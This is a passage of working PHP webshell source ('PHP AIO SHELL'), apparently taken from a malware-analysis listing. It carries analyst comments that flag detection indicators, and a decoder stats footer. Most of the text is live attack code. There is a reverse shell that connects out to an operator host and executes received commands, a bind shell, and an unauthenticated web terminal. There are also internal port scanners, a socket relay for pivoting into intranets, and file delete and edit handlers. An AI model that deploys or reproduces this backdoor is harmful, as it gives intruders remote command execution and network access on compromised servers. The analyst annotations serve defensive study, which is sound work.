return 0;
}
/**
 * Render the "Linux reverse proxy" form and, when all four fields were
 * posted, start run_proxy_client() with them.
 *
 * Analyst note: the POST field names intranet_host, intranet_port,
 * public_host and public_port, together with `?cmd=proxy` in the URL, are
 * stable request indicators for web-server or WAF log searches. The values go
 * to the socket calls without validation.
 *
 * @return int|null -1 when any field is empty; otherwise nothing is returned.
 */
function web_proxy_client()
{
// Static page markup; the closing </head></style> order is as found in the sample.
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<body>
<h3 class="banner">Linux reverse proxy</h3>
<form action="" method="post">
<b>intranet host</b>
<input type="text" name="intranet_host" />
<b>intranet port</b>
<input type="text" name="intranet_port" /><br />
<b>public host</b>
<input type="text" name="public_host" />
<b>public port</b>
<input type="text" name="public_port" /><br /><br />
<input type="submit" value="Run" />
</form>
</body>
</html>';
// The form is always printed first; the relay only starts on a complete POST.
if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
empty($_POST['public_host']) || empty($_POST['public_port']))
return -1;
run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
$_POST['public_host'], $_POST['public_port']);
}
/**
 * Relay bytes between two connected sockets until either side errors or
 * closes, then close both sockets.
 *
 * Analyst note: socket_select() is called with a zero timeout inside
 * `while (true)`, so the loop polls without blocking. A PHP worker pinned at
 * high CPU with two long-lived TCP sessions is the host-level symptom. Data is
 * moved in chunks of at most 1024 bytes.
 *
 * @param mixed  $socket1      First connected socket.
 * @param string $remote_host1 Label for $socket1, used only in messages.
 * @param mixed  $socket2      Second connected socket.
 * @param string $remote_host2 Label for $socket2, used only in messages.
 * @return int Always 0.
 */
function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
while (true) {
// socket_select() rewrites the read array, so it is rebuilt every pass.
$read_sockets = array($socket1, $socket2);
$write_sockets = NULL;
$except_sockets = NULL;
// As written, the third argument is $except (never assigned here), not
// $except_sockets.
if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
echo "socket_select error ".socket_strerror(socket_last_error())."\n";
break;
}
// Direction socket2 -> socket1.
if (in_array($socket2, $read_sockets)) {
//echo "got data from $remote_host2.\n";
$bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
// Loose comparison: a return of false or 0 both take this branch, so the
// "recv no data" branch below is not reached.
if ($bytes2 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
break;
}
//echo "got bytes $bytes2.\n";
if ($bytes2 == 0) {
echo "recv no data from $remote_host2.\n";
break;
}
$ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
if ($ret2 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
break;
}
// A short write ends the relay; there is no retry of the remainder.
if ($ret2 != $bytes2) {
echo "send data failed.\n";
break;
}
//echo "write $ret2 bytes ok.\n";
}
// Direction socket1 -> socket2, same handling as above.
if (in_array($socket1, $read_sockets)) {
//echo "got data from $remote_host1.\n";
$bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
if ($bytes1 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
break;
}
//echo "got bytes $bytes1.\n";
if ($bytes1 == 0) {
echo "recv no data from $remote_host1.\n";
break;
}
$ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
if ($ret1 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
break;
}
if ($ret1 != $bytes1) {
echo "send data failed.\n";
break;
}
//echo "write $ret1 bytes ok.\n";
}
}
echo "proxy done.\n";
socket_close($socket1);
socket_close($socket2);
return 0;
}
/**
 * Create an IPv4 TCP socket, bind it to $local_port and start listening.
 *
 * Analyst note: a listening socket owned by the web-server/PHP process on an
 * unexpected port is a strong host indicator; compare `ss`/`netstat` output
 * against the service's known ports. The bind address is the string '0',
 * presumably the wildcard address (all interfaces) - confirm in a sandbox.
 *
 * @param int|string $local_port Port to listen on.
 * @return mixed The listening socket, or -1 on failure.
 */
function init_proxy_server($local_port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.\n";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.\n";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.\n";
return $socket;
}
/**
 * Listen on two local ports in turn, accept one client on each, and relay
 * traffic between the two accepted connections.
 *
 * Analyst note: no caller of this function is visible in this part of the
 * listing. The second listener is only opened after the first port has
 * received a client.
 *
 * @param int|string $local_port1 First port to listen on.
 * @param int|string $local_port2 Second port to listen on.
 * @return int 0 after the relay ends, -1 if a listener cannot be created.
 */
function run_proxy_server($local_port1, $local_port2)
{
$socket1 = init_proxy_server($local_port1);
if ($socket1 == -1)
return -1;
// Loops until socket_accept() returns a client.
while (true) {
if (($newsock1 = socket_accept($socket1)) !== false) {
socket_getpeername($newsock1, $ip1);
echo "got a client form $ip1\n";
break;
}
}
$socket2 = init_proxy_server($local_port2);
// As written, $socket1 and $newsock1 are left open on this failure path.
if ($socket2 == -1)
return -1;
while (true) {
if (($newsock2 = socket_accept($socket2)) !== false) {
socket_getpeername($newsock2, $ip2);
echo "got a client form $ip2\n";
break;
}
}
echo "start transmit data ...\n";
// run_proxy_core() closes the two accepted sockets; the listeners are closed here.
run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
socket_close($socket2);
socket_close($socket1);
return 0;
}
/**
 * Thin wrapper around fsockopen() with warnings suppressed; the error number
 * and message it fills in are discarded.
 *
 * @param string     $host    Destination host.
 * @param int|string $port    Destination port.
 * @param int|string $timeout Connection timeout passed to fsockopen().
 * @return resource|false Stream on success, false when the connection fails.
 */
function tcp_connect_port($host, $port, $timeout)
{
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
return $fp;
}
/**
 * TCP connect-scan of a fixed list of well-known ports on one host, printing
 * an HTML table row for each port that accepts a connection.
 *
 * Analyst note: the scan originates from the web server, so it can reach
 * hosts an external party cannot. Network telemetry would show a short burst
 * of sequential connection attempts from the web tier to the ports listed
 * below. Host, banner and service values are echoed without HTML escaping.
 *
 * @param string     $host    Target host.
 * @param int|string $timeout Per-port connect timeout.
 * @param mixed      $banner  Non-empty to also read up to 127 bytes from each open port.
 * @return void
 */
function port_scan_fast($host, $timeout, $banner)
{
// Port => service label shown in the result table.
$general_ports = array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'
);
echo '<table>';
foreach($general_ports as $port=>$name) {
// Only ports that accept the connection produce a row.
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
// The read blocks until the service sends a line or the stream times out.
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
/**
 * TCP connect-scan of every port from $src_port to $dst_port (inclusive) on
 * one host, printing an HTML table row for each port that accepts a connection.
 *
 * Analyst note: ports are tried strictly in ascending order, one at a time,
 * which makes the pattern easy to recognise in flow logs. Banner data is
 * echoed without HTML escaping.
 *
 * @param string     $host     Target host.
 * @param int|string $src_port First port of the range.
 * @param int|string $dst_port Last port of the range.
 * @param int|string $timeout  Per-port connect timeout.
 * @param mixed      $banner   Non-empty to print up to 127 bytes read from the
 *                             port instead of "OPEN".
 * @return void
 */
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
echo '<table>
<tr>
<td>Host</td>
<td>Port</td>
<td>State</td>
</tr>';
for ($port = $src_port; $port <= $dst_port; $port++) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>OPEN</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
/**
 * Render the port-scan form and run the requested scan when a host was posted.
 *
 * Analyst note: the request indicators are `?cmd=portscan` plus the POST
 * fields scan_host, scan_timeout, scan_fast and scan_banner. Without
 * scan_fast the full range 1-65535 is scanned sequentially within one HTTP
 * request, so very long-running requests to this URL are themselves a signal.
 *
 * @return int|null -1 when no host was posted; otherwise nothing is returned.
 */
function run_portscan()
{
echo '<html>
<head>
<style>
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
</style>
</head>
<body>
<form action="" method="post">
target host
<input type="text" name="scan_host" value="127.0.0.1" />
timeout
<input type="text" name="scan_timeout" value="5" />
general ports
<input type="checkbox" name="scan_fast" />
banner
<input type="checkbox" name="scan_banner" />
<input type="submit" value="scan" />
</form>
</body>
</html>';
if (empty($_POST['scan_host']))
return -1;
// scan_banner is read without isset(); when the box is unchecked PHP raises
// an undefined-index notice (error_reporting is E_ALL at the top of the file).
if (isset($_POST['scan_fast'])) {
port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
$_POST['scan_banner']);
}
else {
port_scan($_POST['scan_host'], "1", "65535",
$_POST['scan_timeout'],
$_POST['scan_banner']);
}
}
/**
 * Run $cmd through popen() and write its standard output to $socket.
 *
 * Analyst note: this is the command-execution sink for both network shells
 * (connect_backdoor() and bindshell()); $cmd is whatever the remote peer
 * sent. popen() starts a child process under the web-server account, so
 * process-creation telemetry with a web-server or PHP parent is the primary
 * detection point, and listing popen in php.ini `disable_functions` removes
 * this path.
 *
 * @param mixed  $socket Connected socket that receives the output.
 * @param string $cmd    Command line to execute.
 * @return int 0 when the output was forwarded, -1 if a socket write fails
 *             (the pipe is not closed on that path).
 */
function linux_exec($socket, $cmd)
{
// The result of popen() is not checked before it is read.
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$ret = socket_write($socket, $buf, strlen($buf));
if ($ret == false) {
return -1;
}
}
pclose($handle);
return 0;
}
/**
 * Reverse shell: connect out to $host:$port, send a banner, then execute
 * whatever the peer sends and return the output over the same socket.
 *
 * Analyst note: the cleartext banner "connect back from phpshell" is the
 * first payload on the connection and is usable as a network signature.
 * Commands and output cross the socket unencrypted. The read loop has no exit
 * condition, so the PHP worker stays occupied until the request is killed or
 * hits an execution limit.
 *
 * @param string     $host Address to connect back to.
 * @param int|string $port Port to connect back to.
 * @return int|null -1 if the connection or the banner write fails.
 */
function connect_backdoor($host, $port)
{
$banner = "connect back from phpshell\n";
$socket = tcp_connect($host, $port);
if ($socket == -1) {
echo "connect to $host:$port failed.\n";
return -1;
}
echo "connect to $host:$port ok.\n";
$ret = socket_write($socket, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.\n";
socket_close($socket);
return -1;
}
while (true) {
// The result of socket_read() is not checked; each chunk is echoed into
// the HTTP response and passed to linux_exec() as a command.
$buf = socket_read($socket, 1024);
echo $buf;
linux_exec($socket, $buf);
}
}
/**
 * Bind shell: listen on $local_port, accept one client, send a banner, then
 * execute whatever that client sends and return the output.
 *
 * Analyst note: the host indicators are a listening TCP socket owned by the
 * web-server/PHP process and the cleartext banner "bindshell from phpshell".
 * No authentication of the connecting client is visible. Inbound filtering
 * that only admits the published service ports keeps the listener unreachable
 * from outside. The final read loop has no exit condition, so the
 * socket_close() calls and `return 0` after it are never reached.
 *
 * @param int|string $local_port Port to listen on.
 * @return int|null -1 on a setup failure.
 */
function bindshell($local_port)
{
$banner = "bindshell from phpshell\n";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.\n";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.\n";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.\n";
// Loops until one client has been accepted; only that client is served.
while (true) {
if (($newsock = socket_accept($socket)) !== false) {
socket_getpeername($newsock, $ip);
echo "got a client form $ip"."<br />";
break;
}
}
$ret = socket_write($newsock, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.\n";
socket_close($newsock);
socket_close($socket);
return -1;
}
while (true) {
// The result of socket_read() is not checked; each chunk goes to linux_exec().
$buf = socket_read($newsock, 1024);
echo $buf;
linux_exec($newsock, $buf);
}
socket_close($newsock);
socket_close($socket);
return 0;
}
/**
 * Render the two backdoor forms and start a reverse shell or a bind shell
 * according to the posted fields.
 *
 * Analyst note: the request indicators are `?cmd=backdoor` plus the POST
 * fields target_host and target_port (reverse shell) or bind_port (bind
 * shell). The $_POST keys are read without isset(), so a plain GET of this
 * page raises undefined-index notices. With error_reporting(E_ALL) set at the
 * top of the file these may appear in the PHP error log, depending on the
 * server's logging configuration.
 */
function run_backdoor()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<h3 class="banner" >Linux connect backdoor</h3>
<form action="" method="post">
Target host
<input type="text" name="target_host" />
Target port
<input type="text" name="target_port" />
<input type="submit" value="Connect" />
</form>
</br />
<h3 class="banner" >Linux bindshell backdoor</h3>
<form action="" method="post">
Bind port
<input type="text" name="bind_port" />
<input type="submit" value="Bindshell" />
</form>
</html>';
// Values are passed to the socket helpers unvalidated.
if ($_POST['target_host'] && $_POST['target_port']) {
connect_backdoor($_POST['target_host'], $_POST['target_port']);
}
if ($_POST['bind_port']) {
bindshell($_POST['bind_port']);
}
}
/*
function exec_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
echo $buf;
}
pclose($handle);
return 0;
}
function run_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo '<html>
<head>
<style>
input[type=text]
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
textarea
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
</style>
</head>
<body>
<form action="" method="post">
<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
<input style="border:none" color="#384850" type="text" name="shellcmd" />
<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
<textarea name="textarea" cols="150" rows="30" readonly>';
if ($_POST['shellcmd']) {
//echo $user_info['name'].'@'.$host_name.'$';
//echo $_POST['shellcmd'];
exec_shell($_POST['shellcmd']);
echo '</textarea></form></body></html>';
}
}
*/
/**
 * Run $cmd through popen() and return its standard output as one string.
 *
 * Analyst note: this is the execution sink of the in-browser terminal;
 * aio_shell() passes $_POST['shellcmd'] straight in. As with linux_exec(),
 * the observable is a child process spawned under the web-server account,
 * and `disable_functions` can remove popen.
 *
 * @param string $cmd Command line to execute.
 * @return string|null Captured output; $data is never initialised, so a
 *                     command that prints nothing yields null.
 */
function run_terminal_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$data .= $buf."";
}
pclose($handle);
return $data;
}
/**
 * Render the "TERMINAL" page: a prompt built from the process user, host name
 * and working directory, a scroll-back textarea, and a command input. A
 * posted `shellcmd` is executed and its output appended to the session.
 *
 * Analyst note: the request indicators are `?cmd=shell` with the POST field
 * shellcmd. The full command history and output accumulate in
 * $_SESSION['output'], so the PHP session files on disk can hold a transcript
 * of operator activity that is worth preserving during incident response. The
 * footer string "wzt 2014 http://www.cloud-sec.org" is static text usable in
 * content signatures. Command output is echoed into the page without HTML
 * escaping.
 */
function aio_shell()
{
// SERVER_NAME is passed to gethostbyaddr(), which performs a reverse lookup.
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$curr_path = getcwd();
$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
echo '<html>
<head>
<style>
tr.banner
{
font-size: 18px;
font-style:italic;
color:#ffffff;
background-color: #285070;
}
tr.prompt
{
font-size: 14px;
color:#285800;
background-color: #000000;
}
textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
input
{
color: #285800; background-color: #000000;
}
</style>
<script type="text/javascript" language="JavaScript">
function init()
{
document.shell.output.scrollTop = document.shell.output.scrollHeight;
}
</script>
</head>
<body onload="init()">
<table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
<tr class="banner">
<td width="10%"><b>TERMINAL</b></td>
<td align="center">'.$prompt.'</td>
</tr>
<form name="shell" action="" method="post">
<tr class="prompt">
<td colspan="2" nowrap>
<textarea name="output" rows="20" cols="90">';
// The posted command is run unmodified; prompt, command and output are
// appended to the session transcript, which is then replayed in full.
if ($_POST['shellcmd']) {
$cmd_data = $prompt.'$'.$_POST['shellcmd']."\n";
$cmd_data .= run_terminal_shell($_POST['shellcmd']);
$_SESSION['output'] .= $cmd_data;
echo $_SESSION['output'];
}
echo '</textarea><br />'.$prompt.'$'.'
<input style="border:none" type="text" name="shellcmd" />
<input style="border:none" type="submit" value="" />
</td>
</tr>
</form>
<tr class="banner">
<td align="center" height="20" colspan="2"> © wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';
}
/**
 * Minimal dispatcher: route `?cmd=` to the backdoor, shell, port-scan or proxy
 * page, or print a plain menu when no cmd is given.
 *
 * Analyst note: the only entry-point call visible in this listing is
 * aio_main(), and no call to this function appears there, so it looks like an
 * older or alternative front end. Its menu links to `cmd=showdir`, which has
 * no handler in this function. The hard-coded `webshell.php` link target
 * suggests the file name this sample was written to be deployed under.
 */
function webshell_main()
{
if (isset($_GET['cmd'])) {
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
else {
echo '<html>
<body>
<table border="0" cellpadding="10" cellspacing="20">
<tr>
<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
<td><a href="webshell.php?cmd=portscan">port scan</a></td>
<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
</tr>
</body>
</html>';
}
}
/**
 * Main panel: collect host facts, print the "PHP AIO SHELL" banner and menu,
 * then dispatch on the `cmd`, `delete` and `edit` query parameters.
 *
 * Analyst note:
 * - Every page load discloses the process uid/gid, home directory and login
 *   shell, kernel and host name, server software, PHP and Zend versions, the
 *   `disable_functions` setting, the working directory and disk usage of "/".
 * - No authentication or access check is visible in this function.
 * - Request indicators: the query parameters cmd (dir, backdoor, shell,
 *   portscan, proxy), delete and edit, with links pointing at `webshell.php`.
 *   The page title string "PHP AIO SHELL" is static and usable in content
 *   signatures.
 * - The menu also links to cmd=crack and cmd=mysql, which have no handler in
 *   this function.
 * - $_GET keys are read without isset(), so requests that omit them raise
 *   undefined-index notices (error_reporting is E_ALL at the top of the file).
 */
function aio_main()
{
// Identity of the account the PHP process runs as.
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$uid_banner="uid=".$uid."(".$user_info['name'].") ".
"gid=".$user_info['gid']."(".$user_info['name'].") ".
"dir=".$user_info['dir']." ".
"shell=".$user_info['shell'];
// Kernel and host fingerprint.
$uname = posix_uname();
$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
$uname['version']." ".$uname['machine'];
$server_addr=$_SERVER['SERVER_NAME'];
$server_port= $_SERVER['SERVER_PORT'];
$server_time=date("Y/m/d h:i:s",time());
$phpsoft=$_SERVER['SERVER_SOFTWARE'];
$php_version=PHP_VERSION;
$zend_version=zend_version();
// Shows the operator which PHP functions the host has disabled.
$dis_func=get_cfg_var("disable_functions");
$safemode=@ini_get('safe_mode');
// As written, a false/empty safe_mode value is displayed as "On".
if ($safemode == false)
$safemode="On";
$cwd_path=getcwd();
// Disk figures for "/" truncated to whole GB.
$total_disk=disk_total_space("/");
$total_disk_gb=intval($total_disk/(1024*1024*1024));
$free_disk=disk_free_space("/");
$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}
ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}
ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}
li
{
display:inline;
}
a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}
h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
table.banner
{
font-size:14px;
}
tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
p.banner
{
font-size:14px;
}
</style>
</head>
<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />
<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
| Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>
<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />
<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />
</body>
</html>';
// Feature dispatch; the selected page is printed after the closing </html> above.
if ($_GET['cmd']) {
if ($_GET['cmd'] == "dir") {
aio_directory();
}
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
// File operations driven directly by query-string values.
if ($_GET['delete']) {
delete_file($_GET['delete']);
}
if ($_GET['edit']) {
edit_file($_GET['edit']);
}
}
// Unconditional entry point: every request that reaches this file runs
// aio_main(); no authentication check is visible in aio_main() itself.
aio_main();
?>
Function Calls
aio_main | 1 |
posix_getuid | 1 |
session_start | 1 |
error_reporting | 1 |
Stats
MD5 | 29836a2f5e2362706dd3d219a8db5a8f |
Eval Count | 0 |
Decode Time | 234 ms |